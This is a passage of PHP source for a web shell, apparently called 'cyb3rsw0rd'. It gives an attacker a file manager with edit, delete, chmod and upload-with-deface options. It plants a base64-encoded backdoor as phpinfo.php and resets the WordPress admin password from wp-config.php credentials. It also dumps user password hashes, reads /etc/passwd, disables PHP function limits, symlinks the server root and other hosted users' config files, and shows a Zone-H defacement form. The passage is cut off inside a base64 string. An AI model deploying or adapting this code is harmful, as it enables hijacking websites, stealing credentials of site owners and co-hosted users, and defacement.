<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Chmod ----&gt;</b>&nbsp;&nbsp;File : </td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt"><form method=post action=/now2.php><input size=55 name=chmode>&nbsp;&nbsp;Permission : <input name=chmodnum value=777 size=3> <input type=submit value=" Ok "></form></td></tr><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Create Dir ----&gt;</b> Dirctory Name </td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt">
<input name=cdirname size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Create File ----&gt;</b> Name File </td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt"><input name=cfilename size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
<td width="200" align="right" valign="top">
<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Copy ----&gt;</b></b>&nbsp;&nbsp;File : </td>
<td width="750"><font face="Tahoma" style="font-size: 10pt">
<input size=40 name=copyname> To Directory <input size=40 name=cpyto> <input type=submit value =Copy></form></td></tr></table>
<hr></td></tr></tbody></table></div></td></tr><tr><td bgcolor="#c6c6c6">
<p style="margin-top: 0pt; margin-bottom: 0pt" align="center">
<span lang="en-us"><font face="Tahoma" size="1">Coded by Amin Shokohi (Pejvak)<br><a href="http://www.itsecteam.com" target="_blank"><font size=1>iTSecTeam.com</a></font></span></td></tr></tbody></table></div></body></html>';";
$fp = fopen('cyb3rsw0rd.php', 'w');
$r = fwrite($fp, base64_decode($scode));
fclose($fp);
}
}
?>";

$fp = fopen($current_dir.'/phpinfo.php', 'w');
$r = fwrite($fp, base64_decode($source));
fclose($fp);
echo "Backdoor Created Successfully!. This Site is Ready to get Future Damage :) ";
}

echo "</div>";
//echo "<font color=\"adrkpink\">Current Directory: $show_current_dir</font><br/>";
echo "<a href=\"?action=".get(action)."&amp;dir=$prevdir\">Previous Directory</a><br/>";
}
//echo "<form action=\"?action=$action\" method=\"post\"><input type=\"hidden\" name=\"dir\" value=\"".$prevdir."\"><input type=\"submit\" value=\"Previous Directory\"></a><br/>";
echo "<div style=\"text-align:center; font-weight:bold\">[<a href=\"?action=$action&amp;dir=$current_dir\">All</a>] [<a href=\"?action=$action&amp;dir=$current_dir&short=dir\">Directories</a>] [<a href=\"?action=$action&amp;dir=$current_dir&short=file\">Files</a>]</div>";

if (!isset($page)) {$page = 0;}
$total = 0;
if(!($dp = opendir($current_dir))) die ("Cannot open This directory!");
$file_array = array();
 
while ($file = readdir ($dp))
{
if(substr($file,0,1) != '.')
{
$file_array[] =  $file;
}
}
$file_count = count ($file_array);
sort ($file_array);
$items_per_page = $file_count;
if ($file_count > 0)
{
if (file_exists($current_dir."/wp-config.php"))
{
include($current_dir."/wp-config.php");
$DB_Name = DB_NAME;
$DB_User = DB_USER;
$DB_Pass = DB_PASSWORD;
$DB_Host = DB_HOST;
$DB_Table = $table_prefix;
DBconnection($DB_Name, $DB_User, $DB_Host, $DB_Pass);
$site = mysql_fetch_array(mysql_query("SELECT option_value FROM ".$table_prefix."options WHERE option_name='siteurl'"));
$sitename = $site[0];
echo "<font color=\"green\">Site Name:</font> <font color=\"red\">$sitename</font><br/>";
echo "<a target=\"_blank\" href=\"?action=".get(action)."&dir=$current_dir&donow=change_admin_quik\"><font color=\"red\">Change admin Password</font></a><br/>";
if (get(donow)==change_admin_quik)
{
$res = mysql_query("UPDATE ".$table_prefix."users SET user_login='admin', user_pass='9f0a4484b933134d03e1c35ae9fb90b6' WHERE id=1");
if ($res)
{
echo "<font color=\"yellow\">Admin ID &amp; Password Updated Successfully!<br/>";
echo "<form name=\"loginform\" id=\"loginform\" action=\"$sitename/wp-login.php\" method=\"post\">
<input type=\"hidden\" name=\"log\" id=\"user_login\" class=\"input\" value=\"admin\" size=\"20\" tabindex=\"10\" />
<input type=\"hidden\" name=\"pwd\" id=\"user_pass\" class=\"input\" value=\"aassdd\" size=\"20\" tabindex=\"20\" /></label>
<input type=\"submit\" name=\"wp-submit\" id=\"wp-submit\" class=\"button-primary\" value=\"Log In\" tabindex=\"100\" />
<input type=\"hidden\" name=\"redirect_to\" value=\"$sitename/wp-admin/\" /><input type=\"hidden\" name=\"testcookie\" value=\"1\" />
</form>";
}
else
{
echo "<font color=\"red\">Error try again!</font>";
}
}

}
$first_record = $page * $items_per_page;
$last_record = $first_record + $items_per_page;
while (list($fileIndexValue, $file_name) = each ($file_array))
{
if (($fileIndexValue >= $first_record) AND ($fileIndexValue < $last_record))
{

if (get(short)==dir)
{
if (is_dir($current_dir.'/'.$file_name))
{
#echo "<a href=\"?action=$action&amp;dir=$current_dir/$file_name\">$file_name</a><br/>";
echo '<table cellpadding="0" cellspacing="0" style="border-style: solid; border-width: 0px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?action='.$action.'&amp;dir='.$current_dir.'/'.$file_name.'">'.$file_name.'</span></td>
<td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($current_dir.'/'.$file_name)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="#">'.substr(sprintf('%o', fileperms($current_dir.'/'.$file_name)), -3).'</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?action=ren&amp;file_name='.$current_dir.'/'.$file_name.'">Ren</a></td>
<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?action=del&amp;file_name='.$current_dir.'/'.$file_name.'">Del</a></td></tr></table>';

}
}
else if (get(short)==file)
{
if (!is_dir($current_dir.'/'.$file_name))
{
#echo "<a href=\"?action=edit&amp;file_name=$current_dir/$file_name\">$file_name</a>  ". file_size(filesize("$current_dir/$file_name")/1024,1) . "<br/>";
echo '<table cellpadding="0" cellspacing="0" style=" border-style: solid; border-width: 0px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href=?action=edit&amp;file='.$current_dir.'/'.$file_name.'>'.$file_name.'</span></td>
<td valign="top" height="19" width="80"><font face="Tahoma" style="font-size: 9pt">'.file_size(filesize($current_dir.'/'.$file_name)).'</td><td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($current_dir.'/'.$file_name)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="#">'.substr(sprintf('%o', fileperms($current_dir.'/'.$file_name)), -3).'</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?action=edit&amp;file_name='.$current_dir.'/'.$file_name.'">Edit</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?action=ren&amp;file_name='.$current_dir.'/'.$file_name.'">Ren</a></td>
<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?action=del&amp;file_name='.$current_dir.'/'.$file_name.'">Del</a></td></tr></table>';

}
}
else{

if (is_dir($current_dir.'/'.$file_name))
{
/*
echo '<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">';
echo "<tr><td valign=\"top\" height=\"19\" width=\"300\"><p align=\"left\"><span lang=\"en-us\"><font face=\"Tahoma\" style=\"font-size: 9pt\"><a href=\"?action=$action&amp;dir=$current_dir/$file_name\">$file_name</a></span></td></table>";

echo '<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">';
echo "<tr><td valign=\"top\" height=\"19\" width=\"300\"><p align=\"left\"><span lang=\"en-us\"><font face=\"Tahoma\" style=\"font-size: 9pt\"><a href=\"?action=$action&amp;dir=$current_dir/$file_name\">$file_name</a></span></td></table>";
*/

echo '<table cellpadding="0" cellspacing="0" style="border-style: solid; border-width: 0px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?action='.$action.'&amp;dir='.$current_dir.'/'.$file_name.'">'.$file_name.'</span></td>
<td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($current_dir.'/'.$file_name)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="#">'.substr(sprintf('%o', fileperms($current_dir.'/'.$file_name)), -3).'</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?action=ren&amp;file_name='.$current_dir.'/'.$file_name.'">Ren</a></td>
<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?action=del&amp;file_name='.$current_dir.'/'.$file_name.'">Del</a></td></tr></table>';
}
else
{
/*
echo '<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">';
echo "<tr><td valign=\"top\" height=\"19\" width=\"300\"><p align=\"left\"><span lang=\"en-us\"><font face=\"Tahoma\" style=\"font-size: 9pt\"><a href=\"?action=edit&amp;file_name=$current_dir/$file_name\">$file_name</a></span></td> 
<td valign=\"top\" height=\"19\" width=\"65\"><font face=\"Tahoma\" style=\"font-size: 9pt\">". file_size(filesize("$current_dir/$file_name")/1024,1) . "</td>
<td valign=\"top\" height=\"19\" width=\"30\"><font face=\"Tahoma\" style=\"font-size: 9pt\"> ".date('d/m/y',filemtime("$current_dir/$file_name"))."</td></table>";
*/
echo '<table cellpadding="0" cellspacing="0" style="border-style: solid; border-width: 0px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href=?action=edit&amp;file='.$current_dir.'/'.$file_name.'>'.$file_name.'</span></td>
<td valign="top" height="19" width="80"><font face="Tahoma" style="font-size: 9pt">'.file_size(filesize($current_dir.'/'.$file_name)).'</td><td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($current_dir.'/'.$file_name)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="#">'.substr(sprintf('%o', fileperms($current_dir.'/'.$file_name)), -3).'</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?action=edit&amp;file_name='.$current_dir.'/'.$file_name.'">Edit</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?action=ren&amp;file_name='.$current_dir.'/'.$file_name.'">Ren</a></td>
<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?action=del&amp;file_name='.$current_dir.'/'.$file_name.'">Del</a></td></tr></table>';
}
}

$total = $total + filesize("$current_dir/$file_name");
}

}
echo "<br/>";
}
echo "<hr/>";
echo "<div>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
___MK FILE___ <form method=\"post\"><input name=\"newfilename\"><input type=\"submit\" value=\">>\"></form>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
___MK DIR___ <form method=\"post\"><input name=\"newdirname\"><input type=\"submit\" value=\">>\"></form>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
___CREATE BACKDOOR___ <form method=\"post\"><input type=\"hidden\" name=\"backdoor\" value=\"1\"><input type=\"submit\" value=\">>\"></form>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
___CHANGE DIR___ <form method=\"get\"><input name=\"dir\" value=\"$current_dir\"><input type=\"hidden\" name=\"action\" value=\"filemanager\"><input type=\"submit\" value=\">>\"></form>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
___UPLOAD FILE___ <form enctype=\"multipart/form-data\" method=\"post\">
<input type=\"hidden\" name=\"target\" value=\"$current_dir\"><input type=\"file\" name=\"attach\"/>
<br/>Default Deface <input type=\"checkbox\" name=\"defaultdeface\" value=\"1\">
 Safe Deface <input type=\"checkbox\" name=\"safedeface\" value=\"1\"><br/>
<input type=\"hidden\" name=\"upload_option\" value=\"1\">
 <input type=\"submit\" value=\">>\"></form>
</div>";
closedir($dp);
echo "</div>";
}
if (get(action)==edit)
{
$file = get(file);
if (file_exists($file))
{

$open = htmlspecialchars(file_get_contents($file));
if($open){
$exce_code= $open;
}
$source = post(source);
if(isset($_POST['source']) && isset($_POST['file']))
{
$fp = fopen($file, 'w');
$r = fwrite($fp, $source);
fclose($fp);
echo "File Edited Successfully!";
}

  echo "<form action=\"?action=".get(action)."&file=$file\" method=\"post\">";
echo "<br/><textarea cols=\"100\" rows=\"20\" name=\"source\"/>$exce_code</textarea><br/>";
echo "<input type=\"hidden\" name=\"file\" value=\"$file\">";
  echo "<input type=\"Submit\" name=\"mail\" class=\"submit\" value=\"Save\"></form>";
}
else
{
echo "File not exist!!";
}
}
else if (get(action)==esql)
{
echo "<font color=\"teal\"><b><center>MySQL Connection</center></b></font>";
echo "<form method=\"get\">";
echo "<font color=\"yellow\">Database Host:</font><br/><input name=\"DB_Host\"  value=\"localhost\" type=\"text\"><br/>";
echo "<font color=\"yellow\">Database Name:</font><br/><input name=\"DB_Name\" type=\"text\"><br/>";
echo "<font color=\"yellow\">Database User:</font><br/><input name=\"DB_User\" type=\"text\"><br/>";
echo "<font color=\"yellow\">Database Password:</font><br/><input name=\"DB_Pass\" type=\"text\"><br/>";
echo "<font color=\"yellow\">Table Prefix:</font><br/><input name=\"DB_Table\" value=\"wp_\" type=\"text\"><br/>";
echo "<input type=\"hidden\" name=\"action\" value=\"esql_connect\">";
echo "<input type=\"submit\" value=\"Connect\">";
echo "</form>";
}
else if (get(action)==esql_connect)
{
$DB_Name = get(DB_Name);
$DB_User = get(DB_User);
$DB_Host = get(DB_Host);
$DB_Pass = get(DB_Pass);
$table_prefix = get(DB_Table);
$connect = DBconnection($DB_Name, $DB_User, $DB_Host, $DB_Pass);
if (!$connect)
{
echo "Error connect to database!!<br/>";
}
else
{
echo "<center><font color=\"green\"><b>Successfully Kissed the Database, Ready For Fuck!! ;)</b></font></center><br/><br/>";
$site = mysql_fetch_array(mysql_query("SELECT option_value FROM ".$table_prefix."options WHERE option_name='siteurl'"));
$sitename = $site[0];
$sql = "SELECT ID, user_login, user_pass FROM ".$table_prefix."users ORDER BY ID LIMIT 0, 10";
    $items = mysql_query($sql);
    
    if(mysql_num_rows($items)>0)
    {
    while ($item = mysql_fetch_array($items))
    {
	echo "<font color=\"blue=\">ID -</font> <font color=\"green\">$item[0]</font>
	<font color=\"blue=\">Username-</font> <font color=\"green\">$item[1]</font>
	<font color=\"blue=\">Password-</font> <font color=\"green\">$item[2]</font> <br/>";
	}
	}
	else
	{
	echo "<font color=\"red\">No user Found For Fuck baby!!! Try Again :)!!<br/></font>";
	}
echo "<font color=\"green\">Site Name:</font> <font color=\"red\">$sitename</font><br/>";
echo "<font color=\"blue=\"><b>Change User Details:</b></font><br/>";
echo "<form action=\"?action=".get(action)."&DB_Name=$DB_Name&DB_User=$DB_User&DB_Host=$DB_Host&DB_Pass=$DB_Pass&DB_Table=$table_prefix&donow=change_admin_quik\" method=\"post\">";
echo "<font color=\"yellow\">Login Name:</font><br/><input name=\"username\" value=\"admin\" type=\"text\"><br/>";
echo "<font color=\"yellow\">Password:</font><br/><input name=\"pass\" type=\"text\"><br/>";
echo "<font color=\"yellow\">ID:</font><br/><input name=\"id\" type=\"text\"><br/>";
echo "<input type=\"submit\" value=\"Change\">";
echo "</form>";
if (get(donow)==change_admin_quik)
{
$username = post(username);
$pass = post(pass);
$id = post(id);
$password = md5($pass);
$res = mysql_query("UPDATE ".$table_prefix."users SET user_login='".$username."', user_pass='".$password."' WHERE ID='".$id."'");
if ($res)
{
echo "<font color=\"yellow\">Admin ID &amp; Password Updated Successfully!<br/>";
echo "<form name=\"loginform\" id=\"loginform\" target=\"_blank\" action=\"$sitename/wp-login.php\" method=\"post\">
<input type=\"hidden\" name=\"log\" id=\"user_login\" class=\"input\" value=\"".$username."\" size=\"20\" tabindex=\"10\" />
<input type=\"hidden\" name=\"pwd\" id=\"user_pass\" class=\"input\" value=\"".$pass."\" size=\"20\" tabindex=\"20\" /></label>
<input type=\"submit\" name=\"wp-submit\" id=\"wp-submit\" class=\"button-primary\" value=\"Log In\" tabindex=\"100\" />
<input type=\"hidden\" name=\"redirect_to\" value=\"$sitename/wp-admin/\" /><input type=\"hidden\" name=\"testcookie\" value=\"1\" />
</form>";
}
else
{
echo "<font color=\"red\">Error try again!</font>";
}

}

}
}
else if (get(action)==killme)
{
echo "<font color=\"green\"><b>Do You want to kill this shell?? </b></font> <a href=\"?action=".get(action)."&kill=yes\"><font color=\"red\"><b>Yes</b></font></a> <a href=\"?\"><font color=\"red\"><b>No</b></font></a>";
if (get(kill)==yes)
{
echo "<br/><font color=\"green\"><b>Shell Destroyed Successfully </b></font><br/>";
echo "<font color=\"red\">".currentfile()."</font><font color=\"#FFF\"> Removed Successfully </font><br/>";
if (get('dir')=="")
{
$current_dir = str_replace("\\",'/',getcwd());
}
else
{
$current_dir = get('dir');
}
unlink (currentfile());
}
}
if (isset($_GET['action']) && $_GET['action']=='symlink')
{
echo base64_decode('PGRpdiBjbGFzcz1hY3Rpb25ib3g+PGNlbnRlcj48Zm9udCBjb2xvcj0jRkZGPjxiPlN5bWxpbms8L2I+PC9mb250PjwvY2VudGVyPjxmb3JtIG1ldGhvZD1wb3N0PiYjODIyNjsgR2VuZXJhdGUgQSBOZXcgcGhwLmluaSBGaWxlPGJyLz4NCjxpbnB1dCB0eXBlPXN1Ym1pdCBuYW1lPWluaSB2YWx1ZT0iR2VuZXJhdGUiIC8+PC9mb3JtPjxici8+DQo8Zm9ybSBtZXRob2Q9cG9zdD4mIzgyMjY7IEdldCBVc2VybmFtZXM8YnIvPg0KPGlucHV0IHR5cGU9c3VibWl0IG5hbWU9InVzcmUiIHZhbHVlPSJFeHRyYWN0IHVzZXJuYW1lcyIgLz48L2Zvcm0+');
if(isset($_POST['ini']))
{
$r=fopen('php.ini','w');
$rr=" disbale_functions=none ";
fwrite($r,$rr);
$link= base64_decode("cGhwLmluaSBnZW5lcmF0ZWQgc3VjY2Vzc2Z1bGx5ISA8YnIvPjxhIHRhcmdldD1fYmxhbmsgaHJlZj1waHAuaW5pPlZpZXcgcGhwLmluaTwvYT4=");
echo base64_decode($result);
echo $link;
echo base64_decode($endover);
}
if(isset($_POST['usre'])){
echo base64_decode("PGZvcm0gbWV0aG9kPXBvc3Q+PHRleHRhcmVhIHJvd3M9MTAgY29scz01MCBuYW1lPXVzZXI+");
 $users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
echo $str[0]."\n";
}
echo base64_decode("PC90ZXh0YXJlYT48YnI+PGJyPjxpbnB1dCB0eXBlPXN1Ym1pdCBuYW1lPXN1IHZhbHVlPSdHZXQgQ29uZmlnYXJhdGlvbnMnIC8+PC9mb3JtPg==");
}
 echo base64_decode($endover);
	error_reporting(0);
	echo base64_decode($result);
	if(isset($_POST['su']))
	{
	mkdir('cyb3rsw0rd',0777);
	mkdir('cyb3rsw0rd/root',0777);
$rr  = "Options all\n DirectoryIndex cyb3rsw0rd.html\n AddType text/plain .php\n AddHandler server-parsed .php\n AddType text/plain .html\n AddHandler txt .html\n Require None\n Satisfy Any";
$g = fopen('cyb3rsw0rd/.htaccess','w');
fwrite($g,$rr);
$cyb3rsw0rd = symlink("/","cyb3rsw0rd/root");
echo base64_decode("cm9vdCBkaXJlY3RvcnkgYWNjZXNzZWQgc3VjY2Vzc2Z1bGx5ITxicj48YSB0YXJnZXQ9X2JsYW5rIGhyZWY9Y3liM3JzdzByZC9yb290Lz52aWV3IHJvb3Q8L2E+");
$dir=mkdir('CYB3RSW0RD',0777);
$r  = "Options all\n DirectoryIndex cyb3rsw0rd.html\n AddType text/plain .php\n AddHandler server-parsed .php\n  AddType text/plain .html\n AddHandler txt .html\n Require None\n Satisfy Any";
$f = fopen('CYB3RSW0RD/.htaccess','w');
fwrite($f,$r);
echo base64_decode("PGJyPlNlcnZlciBDb25maWdhcmF0aW9ucyBGaWxlcyBHZW5lcmF0ZWQgU3VjY2Vzc2Z1bGx5ITxicj48YSB0YXJnZXQ9X2JsYW5rIGhyZWY9Q3liM3JTdzByZC8+dmlldyBjb25maWd1cmF0aW9uIGZpbGVzPC9hPg==");
 echo base64_decode($endover);
$usr=explode("\n",$_POST['user']);
$configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","config.php","inc/config.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php");
foreach($usr as $uss )
{
$us=trim($uss);
foreach($configuration as $c)
{
$rs="/home/".$us."/public_html/".$c;
$r="Cyb3rSw0rd/".$us."_".$c;
symlink($rs,$r);
}
}
}
}

if(isset($_GET['action']) && $_GET['action'] == 'zoneh'){
echo base64_decode('DQo8ZGl2IGNsYXNzPSJhY3Rpb25ib3giPjxzcGFuIHN0eWxlPSJmb250LXNpemU6MzBweDsgZm9udC1mYW1pbHk6Q29taWMgU2FucyBNUzsgY29sb3I6I0ZGRiI+Wm9uZS1oIE1pcnJvciA8L3NwYW4+PC9iPjwvY2VudGVyPjxicj4NCjxmb3JtIGFjdGlvbj0iP2FjdGlvbj16b25lLWgiIG1ldGhvZD0iUE9TVCI+PHRhYmxlPjx0cj48dGQgaGVpZ2h0PSI0NSIgY29sc3Bhbj0iMiI+PGZvcm0gbWV0aG9kPSJwb3N0Ij4NCjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJkZWZhY2VyIiB2YWx1ZT0iQ3liM3JfU3cwcmQiIC8+PGJyLz4NCjxzZWxlY3QgbmFtZT0iaGFja21vZGUiPg0KPG9wdGlvbiA+LS0tLS0tLS1TRUxFQ1QtLS0tLS0tLTwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iMSI+a25vd24gdnVsbmVyYWJpbGl0eSAoaS5lLiB1bnBhdGNoZWQgc3lzdGVtKTwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iMiIgPnVuZGlzY2xvc2VkIChuZXcpIHZ1bG5lcmFiaWxpdHk8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjMiID5jb25maWd1cmF0aW9uIC8gYWRtaW4uIG1pc3Rha2U8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjQiID5icnV0ZSBmb3JjZSBhdHRhY2s8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjUiID5zb2NpYWwgZW5naW5lZXJpbmc8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjYiID5XZWIgU2VydmVyIGludHJ1c2lvbjwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iNyIgPldlYiBTZXJ2ZXIgZXh0ZXJuYWwgbW9kdWxlIGludHJ1c2lvbjwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iOCIgPk1haWwgU2VydmVyIGludHJ1c2lvbjwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iOSIgPkZUUCBTZXJ2ZXIgaW50cnVzaW9uPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSIxMCIgPlNTSCBTZXJ2ZXIgaW50cnVzaW9uPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSIxMSIgPlRlbG5ldCBTZXJ2ZXIgaW50cnVzaW9uPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSIxMiIgPlJQQyBTZXJ2ZXIgaW50cnVzaW9uPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSIxMyIgPlNoYXJlcyBtaXNjb25maWd1cmF0aW9uPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSIxNCIgPk90aGVyIFNlcnZlciBpbnRydXNpb248L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjE1IiA+U1FMIEluamVjdGlvbjwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iMTYiID5VUkwgUG9pc29uaW5nPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSIxNyIgPkZpbGUgSW5jbHVzaW9uPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSIxOCIgPk90aGVyIFdlYiBBcHBsaWNhdGlvbiBidWc8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjE5IiA+UmVtb3RlIGFkbWluaXN0cmF0aXZlIHBhbmVsIGFjY2VzcyBicnV0ZWZvcmNpbmc8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjIwIiA+UmVtb3RlIGFkbWluaXN0cmF0aXZlIHBhbmVsIGFjY2VzcyBwYXNzd29yZCBndWVzc2luZzwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iMjEiID5SZW1vdGUgYWRtaW5pc3RyYXRpdmUgcGFuZWwgYWNjZXNzIHNvY2lhbCBlbmdpbmVlcmluZzwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iMjIiID5BdHRhY2sgYWdhaW5zdCBhZG1pbmlzdHJhdG9yKHBhc3N3b3JkIHN0ZWFsaW5nL3NuaWZmaW5nKTwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iMjMiID5BY2Nlc3MgY3JlZGVudGlhbHMgdGhyb3VnaCBNYW4gSW4gdGhlIE1pZGRsZSBhdHRhY2s8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjI0IiA+UmVtb3RlIHNlcnZpY2UgcGFzc3dvcmQgZ3Vlc3Npbmc8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjI1IiA+UmVtb3RlIHNlcnZpY2UgcGFzc3dvcmQgYnJ1dGVmb3JjZTwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iMjYiID5SZXJvdXRpbmcgYWZ0ZXIgYXR0YWNraW5nIHRoZSBGaXJld2FsbDwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iMjciID5SZXJvdXRpbmcgYWZ0ZXIgYXR0YWNraW5nIHRoZSBSb3V0ZXI8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjI4IiA+RE5TIGF0dGFjayB0aHJvdWdoIHNvY2lhbCBlbmdpbmVlcmluZzwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iMjkiID5ETlMgYXR0YWNrIHRocm91Z2ggY2FjaGUgcG9pc29uaW5nPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSIzMCIgPk5vdCBhdmFpbGFibGU8L29wdGlvbj4NCjwvc2VsZWN0Pjxici8+DQo8c2VsZWN0IG5hbWU9InJlYXNvbiI+DQo8b3B0aW9uID4tLS0tLS0tLVNFTEVDVC0tLS0tLS0tPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSIxIiA+SGVoLi4uanVzdCBmb3IgZnVuITwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iMiIgPlJldmVuZ2UgYWdhaW5zdCB0aGF0IHdlYnNpdGU8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjMiID5Qb2xpdGljYWwgcmVhc29uczwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iNCIgPkFzIGEgY2hhbGxlbmdlPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSI1IiA+SSBqdXN0IHdhbnQgdG8gYmUgdGhlIGJlc3QgZGVmYWNlcjwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iNiIgPlBhdHJpb3Rpc208L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9IjciID5Ob3QgYXZhaWxhYmxlPC9vcHRpb24+DQo8L3NlbGVjdD4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImFjdGlvbiIgdmFsdWU9InpvbmUtaCI+DQo8Y2VudGVyPjxicj48dGV4dGFyZWEgc3R5bGU9ImNvbG9yOiAjMDA5OTAwOyBiYWNrZ3JvdW5kOnRyYW5zcGFyZW50OyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDA5OTAwOyIgbmFtZT0iZG9tYWluIiBjb2xzPSI2MCIgcm93cz0iOSIgaWQ9ImRvbWFpbnMiPlB1dCBMaXN0IE9mIERvbWFpbnM8L3RleHRhcmVhPg0KPGJyIC8+PGJyIC8+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU